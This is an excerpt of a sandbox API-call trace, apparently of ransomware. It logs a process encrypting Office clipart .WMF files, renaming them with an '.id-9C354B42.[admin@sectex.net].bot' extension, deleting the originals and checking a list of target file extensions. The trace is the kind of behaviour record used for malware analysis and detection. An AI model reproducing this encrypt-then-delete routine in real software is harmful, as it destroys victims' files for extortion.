	[0145.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0145.910] GetLastError () returned 0x0
	[0145.910] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x17b4, lpOverlapped=0x0) returned 1
	[0145.912] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x17c0, lpOverlapped=0x0) returned 1
	[0145.913] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.913] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.913] SetEndOfFile (hFile=0x398) returned 1
	[0145.913] CloseHandle (hObject=0x398) returned 1
	[0145.913] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.913] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.916] CloseHandle (hObject=0x3d8) returned 1
	[0145.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf")) returned 1
	[0145.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".doc") returned 4
	[0145.917] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString=".docx") returned 5
	[0145.917] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.917] lstrlenW (lpString=".pdf") returned 4
	[0145.917] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString=".xls") returned 4
	[0145.917] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.917] lstrlenW (lpString=".xlsx") returned 5
	[0145.917] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.917] lstrlenW (lpString=".ppt") returned 4
	[0145.917] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".zip") returned 4
	[0145.917] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.917] lstrlenW (lpString=".rar") returned 4
	[0145.917] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString=".bz2") returned 4
	[0145.917] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString=".7z") returned 3
	[0145.917] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".dbf") returned 4
	[0145.917] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".1cd") returned 4
	[0145.917] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".jpg") returned 4
	[0145.917] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.917] lstrlenW (lpString=".doc") returned 4
	[0145.918] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString=".docx") returned 5
	[0145.918] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.918] lstrlenW (lpString=".pdf") returned 4
	[0145.918] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString=".xls") returned 4
	[0145.918] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.918] lstrlenW (lpString=".xlsx") returned 5
	[0145.918] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.918] lstrlenW (lpString=".ppt") returned 4
	[0145.918] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.918] lstrlenW (lpString=".zip") returned 4
	[0145.918] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.918] lstrlenW (lpString=".rar") returned 4
	[0145.918] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString=".bz2") returned 4
	[0145.918] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString=".7z") returned 3
	[0145.918] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.918] lstrlenW (lpString=".dbf") returned 4
	[0145.918] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.918] lstrlenW (lpString=".1cd") returned 4
	[0145.918] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 63
	[0145.918] lstrlenW (lpString=".jpg") returned 4
	[0145.918] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.918] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.919] lstrlenW (lpString="FD00361_.WMF") returned 12
	[0145.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.919] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4074) returned 1
	[0145.919] CloseHandle (hObject=0x3d8) returned 1
	[0145.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf")) returned 0x20
	[0145.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.919] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.920] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0145.920] GetLastError () returned 0x0
	[0145.920] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xfea, lpOverlapped=0x0) returned 1
	[0146.085] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xff0, lpOverlapped=0x0) returned 1
	[0146.087] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.087] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.087] SetEndOfFile (hFile=0x398) returned 1
	[0146.370] CloseHandle (hObject=0x398) returned 1
	[0146.370] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.370] SetEndOfFile (hFile=0x3d8) returned 1
	[0146.555] CloseHandle (hObject=0x3d8) returned 1
	[0146.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.555] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf")) returned 1
	[0146.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString=".doc") returned 4
	[0146.556] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString=".docx") returned 5
	[0146.556] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.556] lstrlenW (lpString=".pdf") returned 4
	[0146.556] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString=".xls") returned 4
	[0146.556] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.556] lstrlenW (lpString=".xlsx") returned 5
	[0146.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.556] lstrlenW (lpString=".ppt") returned 4
	[0146.556] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString=".zip") returned 4
	[0146.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.556] lstrlenW (lpString=".rar") returned 4
	[0146.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString=".bz2") returned 4
	[0146.556] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString=".7z") returned 3
	[0146.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString=".dbf") returned 4
	[0146.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString=".1cd") returned 4
	[0146.556] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.556] lstrlenW (lpString=".jpg") returned 4
	[0146.556] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString=".doc") returned 4
	[0146.557] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString=".docx") returned 5
	[0146.557] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.557] lstrlenW (lpString=".pdf") returned 4
	[0146.557] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString=".xls") returned 4
	[0146.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.557] lstrlenW (lpString=".xlsx") returned 5
	[0146.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.557] lstrlenW (lpString=".ppt") returned 4
	[0146.557] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString=".zip") returned 4
	[0146.557] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.557] lstrlenW (lpString=".rar") returned 4
	[0146.557] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString=".bz2") returned 4
	[0146.557] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString=".7z") returned 3
	[0146.557] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString=".dbf") returned 4
	[0146.557] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString=".1cd") returned 4
	[0146.557] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63
	[0146.557] lstrlenW (lpString=".jpg") returned 4
	[0146.557] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.558] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.558] lstrlenW (lpString="FD00543_.WMF") returned 12
	[0146.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0146.558] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1472) returned 1
	[0146.558] CloseHandle (hObject=0x3d8) returned 1
	[0146.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf")) returned 0x20
	[0146.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0146.559] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.559] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.559] GetLastError () returned 0x0
	[0146.559] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5c0, lpOverlapped=0x0) returned 1
	[0146.561] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5d0, lpOverlapped=0x0) returned 1
	[0146.562] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.562] WriteFile (in: hFile=0x3a0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.562] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.562] CloseHandle (hObject=0x3a0) returned 1
	[0146.562] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.562] SetEndOfFile (hFile=0x3d8) returned 1
	[0146.564] CloseHandle (hObject=0x3d8) returned 1
	[0146.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.565] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf")) returned 1
	[0146.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.565] lstrlenW (lpString=".doc") returned 4
	[0146.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.565] lstrlenW (lpString=".docx") returned 5
	[0146.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.565] lstrlenW (lpString=".pdf") returned 4
	[0146.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.565] lstrlenW (lpString=".xls") returned 4
	[0146.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.565] lstrlenW (lpString=".xlsx") returned 5
	[0146.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.565] lstrlenW (lpString=".ppt") returned 4
	[0146.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.565] lstrlenW (lpString=".zip") returned 4
	[0146.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.565] lstrlenW (lpString=".rar") returned 4
	[0146.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString=".bz2") returned 4
	[0146.566] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString=".7z") returned 3
	[0146.566] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString=".dbf") returned 4
	[0146.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString=".1cd") returned 4
	[0146.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString=".jpg") returned 4
	[0146.566] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString=".doc") returned 4
	[0146.566] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString=".docx") returned 5
	[0146.566] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.566] lstrlenW (lpString=".pdf") returned 4
	[0146.566] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString=".xls") returned 4
	[0146.566] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.566] lstrlenW (lpString=".xlsx") returned 5
	[0146.566] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.566] lstrlenW (lpString=".ppt") returned 4
	[0146.566] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.566] lstrlenW (lpString=".zip") returned 4
	[0146.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.567] lstrlenW (lpString=".rar") returned 4
	[0146.567] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.567] lstrlenW (lpString=".bz2") returned 4
	[0146.567] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.567] lstrlenW (lpString=".7z") returned 3
	[0146.567] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.567] lstrlenW (lpString=".dbf") returned 4
	[0146.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.567] lstrlenW (lpString=".1cd") returned 4
	[0146.567] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 63
	[0146.567] lstrlenW (lpString=".jpg") returned 4
	[0146.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.567] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.567] lstrlenW (lpString="FD00544_.WMF") returned 12
	[0146.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.572] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=5260) returned 1
	[0146.572] CloseHandle (hObject=0x3d0) returned 1
	[0146.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf")) returned 0x20
	[0146.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.572] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.572] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
